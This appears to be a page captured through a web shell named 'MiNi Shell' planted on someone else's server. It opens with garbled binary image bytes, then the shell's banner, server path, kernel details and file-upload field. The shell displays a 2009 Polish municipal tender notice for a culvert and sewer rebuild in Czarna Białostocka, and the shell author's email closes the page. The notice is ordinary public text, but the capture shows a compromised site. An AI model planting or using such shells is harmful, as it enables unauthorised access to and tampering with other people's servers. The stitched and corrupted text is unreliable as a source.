JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090731/262188-N-2009.html

<p class="kh_header"><b>Czarna Białostocka: Budowa przepustu w ul. Kasztanowej w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 262188 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przepustu w ul. Kasztanowej w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy budowy przepustu w ul. Kasztanowej w Czarnej Białostockiej, prace wchodzące w zakres przedmiotu zamówienia:
wykonanie przepustu stalowego z blachy falistej z przekroju kołowym o średnicy 2 x 1,80 m i długości po skosie 11,95 m: wykonanie na czas budowy przepustu - tymczasowego rowu, lub grobli ziemnej tymczasowej na cieku z odprowadzeniem wód rurociągiem tymczasowym o śr. 1500 mm, wykonanie ręcznego i mechanicznego usunięcia warstwy ziemi urodzajnej (humusu) gr. 15 cm - 357 m2, rozebranie obiektów kubaturowych - kładka drewniana - 2 m3, wykonanie ścianki szczelnej L=6,0 m, wykonanie przepustu z konstrukcji stalowych karbowanych, ocynkowanych, wykonanie wykopów pod ławy w gruncie niespoistym wraz z umocnieniem - 567 m3, wykonanie ław i przyczółków przepustu betonem klasy B30 W8F150 w deskowaniu - 107 m3, oraz betonem klasy B15 w deskowaniu - 13 m3 ze zbrojeniem stalą klasy AII (18G2) - 6238 kg, wykonanie przepustu stalowego z blachy falistej o przekroju kołowym - śr. 2 x 1,80m - 24m, zasypanie wykopów wraz z zagęszczeniem - 500 m3, wykonanie tymczasowej podbudowy z kruszywa naturalnego stabilizowanego mechanicznie gr. ok. 36 cm po zagęszczeniu  - 75 m2, wykonanie humusowania skarp przy grubości humusu 6-15 cm z obsianiem trawą- 49 m2, wykonanie umocnienia skarp brukowcem na podsypce - 80 m2, wykonanie umocnienia dna rowu brukowcem - 22 m2, wykonanie bariero poręczy na obiektach mostowych - 22 mb;
przebudowa sieci kanalizacji sanitarnej wraz z przepompownią ścieków: wykonanie geodezyjnego tyczenia trasy sieci, wykopy pod kanały sanitarne grawitacyjne i tłoczne oraz studnie kanalizacyjne, wykonanie kanału sanitarnego z rur PCV, litych, klasy S o śr. 200 mm - ok. 5 mb, montaż studni kanalizacyjnych z kręgów betonowych śr. 1000 z włazem żeliwnym D 600, 40T - szt. 1, wykonanie studni rozprężnej, betonowej śr. 1000 z włazem żeliwnym D 600, 40T - szt.1, dostawa i montaż pompowni ścieków wraz z okablowaniem elektrycznym, podłączeniem do energetycznej listwy zasilającej, uruchomienie, wykonanie kanału tłocznego PE 180  - ok. 20 mb, wykonanie tymczasowego kanału tłocznego PE 90 - ok. 40 mb, wykonanie rurociągu tłocznego PE 90 w rurze ochronnej HDPE 200 - ok. 24 mb, demontaż istniejących kolidujących odcinków kanalizacji sanitarnej grawitacyjnej i tłocznej, wykonanie geodezyjnej inwentaryzacji powykonawczej;
przebudowa sieci wodociągowej: wykonanie geodezyjnego tyczenia trasy sieci, wykopy pod kanały - ok. 17 m3, wykonanie tymczasowego odcinka sieci wodociągowej PE 110 - ok. 44 mb, wykonanie wodociągu PE 110, PN10, SDR 17 - ok. 36 mb w rurze ochronnej HDPE 200, wykonanie geodezyjnej inwentaryzacji powykonawczej; wykonanie oświetlenia i zasilania przepompowni ścieków: wykonanie napowietrznej linii oświetleniowej AsXSn 2 x 25 mm2 - ok. 32 mb wraz ze słupem typu np. K-10,5/4,3 oraz oprawą oświetleniową np. OUSc-150 - szt. 1 z podpięciem do istniejącego obwodu oświetlenia ulicznego, wykonanie przyłącza zapomiarowego nn YAKY-żo 5 x 16 mm2 - ok. 23 mb;
budowa kanalizacji deszczowej na odcinku KD1/1 do W1: wykonanie geodezyjnego tyczenia trasy sieci, wykopy pod kanały i studnie  - ok. 25 m3, wykonanie kanału deszczowego śr. 400 mm z rur PCV - ok. 7,0 mb, montaż betonowej studni kanalizacyjnej śr. 1200 mm, wykonanie geodezyjnej inwentaryzacji powykonawczej.
Szczegółowy zakres prac zawierają: przedmiary robót stanowiące Załącznik nr 1 do SIWZ, Specyfikacje Techniczne Wykonania i Odbioru Robót stanowiące Załącznik nr 2 do SIWZ, projekty wykonawcze stanowiące Załącznik nr 3 do SIWZ.
Wymagany okres gwarancji min. 36 miesięcy od daty podpisania przez Zamawiającego i Wykonawcę protokołu odbioru końcowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.20.00-9, 45.23.24.00-6, 45.23.21.50-8, 45.23.22.10-7, 45.23.21.30-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10.000,- zł (słownie: dziesięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy: posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; niepodlegający wykluczeniu z postępowania o udzielenie zamówienia. 
Ocena spełniania warunków udziału w postępowaniu przeprowadzona zostanie, według formuły spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
Z ubiegania się o zamówienie publiczne wyklucza się Wykonawców, którzy:
nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy Prawo zamówień publicznych opisanych w pkt. 5.1. SIWZ; podlegają wykluczeniu na mocy art. 24 ust. 1 ustawy Prawo zamówień publicznych; wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji; złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych; nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
 Zamawiający odrzuca ofertę: niezgodną z ustawą Prawo zamówień publicznych; której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem okoliczności wskazanej w art. 87 ust. 2 pkt. 3 ustawy Prawo zamówień publicznych; której złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; Wykonawcy wykluczonego z udziału w postępowaniu o udzielenie zamówienia; zawierającą błędy w obliczeniu ceny; Wykonawcy, który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust 2 pkt. 3 ustawy Prawo zamówień publicznych; jest nieważna na podstawie odrębnych przepisów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych z udziału w postępowaniu o zamówienie publiczne Wykonawca składa następujące oświadczenia i dokumenty: aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób podpisujących ofertę, o ile fakt ten nie wynika z przedstawionych dokumentów rejestrowych.
W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty: wykaz minimum 3 wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających lub większych swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania oraz odbiorców; do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.), wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 5 do SIWZ; wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z dokumentami potwierdzającymi posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalności budowlanej i sanitarnej oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby; w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie, wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 6 do SIWZ; pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 9.2 lit. b Wykonawca wskazał osoby, którymi będzie dysponował.
W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, suma ubezpieczenia wynikająca z polisy powinna być równa lub wyższa cenie ofertowej brutto.
Inne dokumenty i załączniki: kosztorys ofertowy sporządzony w oparciu o przedmiary robót stanowiące załącznik do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej; 16-020 Czarna Białostocka, ul. Traugutta 2, pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 10:00, miejsce: Urząd Miejski w Czarnej Białostockiej; 16-020 Czarna Białostocka, ul. Traugutta 2, pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com